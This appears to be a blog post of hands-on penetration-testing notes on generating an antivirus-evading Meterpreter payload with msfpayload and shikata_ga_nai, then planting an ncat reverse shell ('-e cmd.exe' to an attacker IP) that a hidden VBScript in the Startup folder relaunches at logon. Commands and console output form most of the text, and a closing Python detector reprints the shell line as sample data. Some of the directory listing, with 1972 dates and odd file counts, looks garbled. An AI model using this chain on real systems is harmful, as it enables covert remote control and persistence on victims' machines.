I’ve been locked away working for long periods without socializing.

MyExploit has been busy in the lab; here are working notes on what we're up to. Some will understand, most won't. 24 months back we wouldn't have; please ask questions.

Welcome the start of the game changer!

\x00\x0a\x0d

\x00 = zero byte

\x0a = Line feed

\x0d = Carriage return

Avoid addresses containing a zero byte (\x00)
It is the string terminator in C and it breaks exploits

Avoid Line Feed (\x0a)
It breaks exploits

Avoid Carriage Return (\x0d)
Do you sense a common theme?

Use msfencode, which takes raw shellcode and generates an encoded version without the bad characters.

msfpayload windows/shell_reverse_tcp LHOST=192.168.20.11 LPORT=443 R | msfencode -a x86 -b '\x00\x0a\x0d' -t c

msfpayload is a command-line instance of Metasploit that is used to generate and output all of the various types of shellcode

root@bt:~# msfpayload -h

Usage: /opt/metasploit-4.1.4/msf3/msfpayload [] [var=val]

———————————-

encoders

root@bt:~# msfencode -l -a x86

Framework Encoders (architectures: x86)
=======================================

Name                            Rank        Description
----                            ----        -----------
generic/none                    normal      The "none" Encoder
x86/alpha_mixed                 low         Alpha2 Alphanumeric Mixedcase Encoder
x86/alpha_upper                 low         Alpha2 Alphanumeric Uppercase Encoder
x86/avoid_underscore_tolower    manual      Avoid underscore/tolower
x86/avoid_utf8_tolower          manual      Avoid UTF8/tolower
x86/call4_dword_xor             normal      Call+4 Dword XOR Encoder
x86/context_cpuid               manual      CPUID-based Context Keyed Payload Encoder
x86/context_stat                manual      stat(2)-based Context Keyed Payload Encoder
x86/context_time                manual      time(2)-based Context Keyed Payload Encoder
x86/countdown                   normal      Single-byte XOR Countdown Encoder
x86/fnstenv_mov                 normal      Variable-length Fnstenv/mov Dword XOR Encoder
x86/jmp_call_additive           normal      Jump/Call XOR Additive Feedback Encoder
x86/nonalpha                    low         Non-Alpha Encoder
x86/nonupper                    low         Non-Upper Encoder
x86/shikata_ga_nai              excellent   Polymorphic XOR Additive Feedback Encoder
x86/single_static_bit           manual      Single Static Bit
x86/unicode_mixed               manual      Alpha2 Alphanumeric Unicode Mixedcase Encoder
x86/unicode_upper               manual      Alpha2 Alphanumeric Unicode Uppercase Encoder

root@bt:~# msfencode -h

Usage: /opt/metasploit-4.1.4/msf3/msfencode

OPTIONS:

-a The architecture to encode as
-b The list of characters to avoid: '\x00\xff'
-c The number of times to encode the data
-d Specify the directory in which to look for EXE templates
-e The encoder to use
-h Help banner
-i Encode the contents of the supplied file path
-k Keep template working; run payload in new thread (use with -x)
-l List available encoders
-m Specifies an additional module search path
-n Dump encoder information
-o The output file
-p The platform to encode for
-s The maximum size of the encoded data
-t The output format: raw,ruby,rb,perl,pl,bash,sh,c,js_be,js_le,java,dll,exe,exe-small,elf,macho,vba,vba-exe,vbs,loop-vbs,asp,aspx,war,psh,psh-net
-v Increase verbosity
-x Specify an alternate executable template

msfpayload windows/meterpreter/reverse_tcp LHOST=ip-address LPORT=4445 R | msfencode -e x86/shikata_ga_nai -t raw -a x86 -b '\x00\x0a\x0d' -c 1 > /var/www/share/myexploit.bin

(LPORT of choice)

windows/meterpreter/reverse_tcp = Connect back to the attacker, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)

-e = The encoder to use. For this example we used x86/shikata_ga_nai

x86/shikata_ga_nai = Polymorphic XOR Additive Feedback Encoder. In computer terminology, polymorphic code is code that uses a polymorphic engine to mutate while keeping the original algorithm intact. That is, the code changes itself each time it runs, but the function of the code (its semantics) will not change at all. This technique is sometimes used by computer viruses, shellcodes and computer worms to hide their presence.
Most anti-virus software and intrusion detection systems (IDS) attempt to locate malicious code by searching through computer files and data packets sent over a computer network. If the security software finds patterns that correspond to known computer viruses or worms, it takes appropriate steps to neutralize the threat. Polymorphic algorithms make it difficult for such software to recognise the offending code because it constantly mutates.

-t = The output format. For this example we used raw

-a = The architecture to encode as. The example uses x86 (Intel microprocessor architecture; also works with AMD)

-b = The list of characters to avoid: '\x00\x0a\x0d'

-c = The number of times to encode the data. The example uses 1.

> = Shell output redirection. The example writes the finalized .bin file to the folder /var/www/share/. The -x option (specify an alternate executable template) is not used in this example.

———————————–

Uploading netcat using port 80 to make the host dial back. To make this work we shut down Apache (HTTP server), as this service was used to start the attack.

meterpreter > upload /root/nmap/ncat.exe C:\
[*] uploading : /root/nmap/ncat.exe -> C:\
[*] uploaded : /root/nmap/ncat.exe -> C:\\ncat.exe

meterpreter > upload /root/nmap/nc.bat C:\
[*] uploading : /root/nmap/nc.bat -> C:\
[*] uploaded : /root/nmap/nc.bat -> C:\\nc.bat

meterpreter > upload /root/nmap/VBS.vbs C:\
[*] uploading : /root/nmap/VBS.vbs -> C:\
[*] uploaded : /root/nmap/VBS.vbs -> C:\\VBS.vbs

The .bat file uploaded.

@echo off
start /B C:\ncat.exe -v 192.168.1.4 80 -e cmd.exe

(saved as a .bat)

/B = Start application without creating a new window.

The .vbs file uploaded – This is to make the bat file run invisibly

Set WshShell = CreateObject("WScript.Shell")
WshShell.Run chr(34) & "C:\nc.bat" & Chr(34), 0
Set WshShell = Nothing

(saved as a .vbs file)

meterpreter > execute -f cmd.exe -c
Process 3456 created.
Channel 4 created.
meterpreter > interact 4
Interacting with channel 4…

Microsoft Windows XP [Version 5
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\test\Desktop\Test2>cd c:\
cd c:\

C:\>dir
dir
Volume in drive C has no label.
Volume Serial Number is 0042-5616

Directory of C:\

31/01/2011 17:35 0 AUTOEXEC.BAT
31/01/2011 17:35 0 CONFIG.SYS
13/09/1972 11:37 Documents and Settings
25/06/1972 17:19 Inetpub
24/09/1972 16:54 43 nc.bat
24/09/1972 15:43 186,880 ncat.exe
10/09/1972 14:15 Program Files
24/09/1972 16:54 116 VBS.vbs
24/09/1972 15:37 WINDOWS
16/08/1972 09:10 xampp
2008 File(s) 800,000 bytes
2008 Dir(s) 25,000,000 bytes free

Move the .vbs startup file from C to the Startup folder.

C:\>move c:\VBS.vbs "C:\Documents and Settings\test\Start Menu\Programs\Startup"

Reboot PC

C:\Documents and Settings\test\Desktop\Test2>shutdown -r -t 0
shutdown -r -t 0

C:\Documents and Settings\test\Desktop\Test2>
[*] 192.168.1.2 – Meterpreter session 4 closed. Reason: Died

Stop Apache

Once a person logs into Windows it triggers the .vbs file that starts up C:\ncat.exe -v 192.168.1.4 80 -e cmd.exe

root@bt:~# nc -lvvp 80
listening on [any] 80 …
192.168.1.2: inverse host lookup failed: Unknown server error : Connection timed out
connect to [192.168.1.4] from (UNKNOWN) [192.168.1.2] 1027
Microsoft Windows XP [Version 5
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\11>
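
The same chain seen from the defender's side, as an added example that is not part of the original notes: a Python triage pass that flags a script in a Startup folder calling WshShell.Run with window style 0, follows it to the file it launches, and checks that file for ncat/nc started with -e. The function and pattern names are made up for this example, and the file contents are constructed samples modelled on the listings above.

```python
import re

# WshShell.Run <command>, 0  -> window style 0 means "no visible window"
HIDDEN_RUN = re.compile(r'\.Run\s+(?P<cmd>.+?),\s*0\s*(?:,|$)', re.I | re.M)
# First drive-letter path to a script or binary inside the Run argument
TARGET = re.compile(r'[A-Za-z]:\\[^"\r\n]+?\.(?:bat|cmd|exe|ps1|vbs|js)', re.I)
# ncat/nc handing a program to the socket (-e / --exec / -c / --sh-exec)
NC_EXEC = re.compile(r'\b(?:ncat|nc)(?:\.exe)?\b.*?\s(?:-e|--exec|-c|--sh-exec)'
                     r'\s+(?P<prog>\S+)', re.I)
# Script files sitting directly in a Startup folder
STARTUP = re.compile(r'\\Start Menu\\Programs\\Startup\\[^\\]+\.(?:vbs|vbe|js|jse|wsf)$',
                     re.I)

def triage(files):
    """files: {full path: text}. Returns one finding per hidden Run call."""
    by_path = {p.lower(): t for p, t in files.items()}
    findings = []
    for path, text in files.items():
        if not STARTUP.search(path):
            continue
        for run in HIDDEN_RUN.finditer(text):
            hit = TARGET.search(run.group('cmd'))
            target = hit.group(0) if hit else None
            body = by_path.get(target.lower(), '') if target else ''
            nc = NC_EXEC.search(body)
            findings.append({'script': path, 'target': target,
                             'shell_over_socket': nc.group('prog') if nc else None})
    return findings

# Constructed sample contents modelled on the listings above, not real evidence
STARTUP_DIR = r'C:\Documents and Settings\test\Start Menu\Programs\Startup'
SAMPLE = {
    STARTUP_DIR + r'\VBS.vbs': r'''Set WshShell = CreateObject("WScript.Shell")
WshShell.Run chr(34) & "C:\nc.bat" & Chr(34), 0
Set WshShell = Nothing''',
    r'C:\nc.bat': r'''@echo off
start /B C:\ncat.exe -v 192.168.1.4 80 -e cmd.exe''',
    # Benign control: visible window (style 1), so it is not reported
    STARTUP_DIR + r'\sync.vbs': r'''Set s = CreateObject("WScript.Shell")
s.Run "C:\Tools\sync.exe", 1''',
}

if __name__ == '__main__':
    for finding in triage(SAMPLE):
        print(finding)
```

A hidden Run call on its own has legitimate uses, so treat a finding with shell_over_socket set as the high-confidence one and the rest as leads to review.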
